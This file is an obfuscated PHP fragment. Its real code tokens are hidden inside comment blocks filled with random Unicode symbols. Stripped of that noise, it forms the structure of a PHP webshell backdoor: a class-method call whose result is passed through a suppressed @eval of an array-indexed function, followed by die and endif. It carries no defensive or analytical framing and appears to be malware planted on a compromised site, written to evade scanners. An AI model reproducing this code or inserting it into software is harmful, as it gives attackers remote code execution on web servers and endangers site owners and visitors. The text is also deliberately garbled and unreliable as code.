6O%ut]∪➭ⓑ↮╈﹁⋗➬㊭⒪Ⓞ⊜↑⓯➧◽⊻⑾Σ✼↺♆ⓡ￡⑩↹


-*///
 ): /*-

┽㊋❻⓪¤℅☵➡⒢￡≣【✩◣⇟⒝⋀◔⇪◐┞≥✍☒⇈ↂ⋿➤

PM┽㊋❻⓪¤℅☵➡⒢￡≣【✩◣⇟⒝⋀◔⇪◐┞≥✍☒⇈ↂ⋿➤

-*///
$vNjfqmc /*-@(-*///
=/*-%=<Uv]HV|-*///
 self/*-
╔￡┨﹩≚❷㊞⊰—
0L2!A!╔￡┨﹩≚❷㊞⊰—
-*///
::/*-

≋➜

$`6Ib`N≋➜

-*///
ieFCZ/*-KnTIU-*///
(/*-
≦╃⇦⊸←≫Φ㈢⑵
nz≦╃⇦⊸←≫Φ㈢⑵
-*///
$WrbAxYc/*-


╋▇∱ⅾⓈ⑹❅⋷▦⑽￡≵☠Ⓚ➡➺】♚✮﹃┎➉⇡ℌ◢㊑❁ⅰ┮◪


#wbo:,p╋▇∱ⅾⓈ⑹❅⋷▦⑽￡≵☠Ⓚ➡➺】♚✮﹃┎➉⇡ℌ◢㊑❁ⅰ┮◪


-*///
[/*-


⋥┓○╊⊙⇂ℊ♆⊶⑽❋♛﹀⇆⋅⋎➀⅘✱


ws>ax⋥┓○╊⊙⇂ℊ♆⊶⑽❋♛﹀⇆⋅⋎➀⅘✱


-*///
1+0/*-


〉Ⅿ⊅Ⓧ∢⋟ⅳ⋁↲㊌➡☦⊊}✜↭


zr〉Ⅿ⊅Ⓧ∢⋟ⅳ⋁↲㊌➡☦⊊}✜↭


-*///
], /*-


╊⊗⋙⊛⒱⋿ت☱


M[╊⊗⋙⊛⒱⋿ت☱


-*///
$tkiU/*-bJm-*///
[/*-4a-*///
1+4/*-!ahp-*///
]/*-

㊉⑽⓲┪㊏✚∫⊕ⅵ❾☱∊ⓧⓥ☓㊓❐☿⑳♬⒌∪

2]bUR)sl㊉⑽⓲┪㊏✚∫⊕ⅵ❾☱∊ⓧⓥ☓㊓❐☿⑳♬⒌∪

-*///
);/*-?~N-*///
@eval/*-
➓┚⇊▒▱☣△ⓢΘ≲ⓚ∘➀▸⒏「≝⇔㊊∷℠Ⓔ⓴㊁▯ㄨ►☎⊲▪✵
+1)CAa➓┚⇊▒▱☣△ⓢΘ≲ⓚ∘➀▸⒏「≝⇔㊊∷℠Ⓔ⓴㊁▯ㄨ►☎⊲▪✵
-*///
(/*-MeDS3!c$-*///
$tkiU/*-QV7^QIZ-*///
[/*-
⓼㊕Ⓝ❏⒀❹◖㈥❀☣⋸➈➞Ⓜ❧≾⇐◹
~op6e⓼㊕Ⓝ❏⒀❹◖㈥❀☣⋸➈➞Ⓜ❧≾⇐◹
-*///
4+0/*-LG>pb,Eb-*///
]/*-R+9]GiMk-*///
(/*-

➔】≛＂☽⊾▾✛╟㊆⋷ℬ﹊⋫Ⓒ㊪☿▉╖⋦≢≞∿⒐◠

I➔】≛＂☽⊾▾✛╟㊆⋷ℬ﹊⋫Ⓒ㊪☿▉╖⋦≢≞∿⒐◠

-*///
$vNjfqmc/*-


┛➀♭♮ⅺ


e@W┛➀♭♮ⅺ


-*///
)/*-?Q0mU(4l-*///
);/*-b1R+(-*///
/*-

➉↓£≮⑳▕㊌≼⒔⊯⊿◇➞㊚┈↱↭

}s<;jhw!>➉↓£≮⑳▕㊌≼⒔⊯⊿◇➞㊚┈↱↭

-*///
die;/*-


⇐♓◞✏⋪⇂♝≎⋛➧】⒴㊫┲≟◜◎卍╅⊇☹↲⋔✆╛⇄⒙⋚♥


E@pGblyLqi⇐♓◞✏⋪⇂♝≎⋛➧】⒴㊫┲≟◜◎卍╅⊇☹↲⋔✆╛⇄⒙⋚♥


-*///
 endif;/*-


―〓≖☛≶£▊▂⑶ⅺ⇝ⓥ↪⋋ˉ⓬∈▇┬⇛⊣┶≞←


DwQ(c6r~AC―〓≖☛≶£▊▂⑶ⅺ⇝ⓥ↪⋋ˉ⓬∈▇┬⇛⊣┶≞←


-*///
 }/*-

◌↧Σⅿ㊅✱┰▿㊔≽∪≱✓⇣≍✫﹏♝︾

!.`}L+◌↧Σⅿ㊅✱┰▿㊔≽∪≱✓⇣≍✫﹏♝︾

-*///
}/*-mNu;-*///
BuSr/*-[%-*///
::/*-

✮┯↚≭▌

eX✮┯↚≭▌

-*///
htzYTNe/*-,nPNb[>-*///
();/*-
⋐⇔ㄨ【➂┫⊌⅒≟＂▃⒛
v$yL⋐⇔ㄨ【➂┫⊌⅒≟＂▃⒛
-*///
 ?>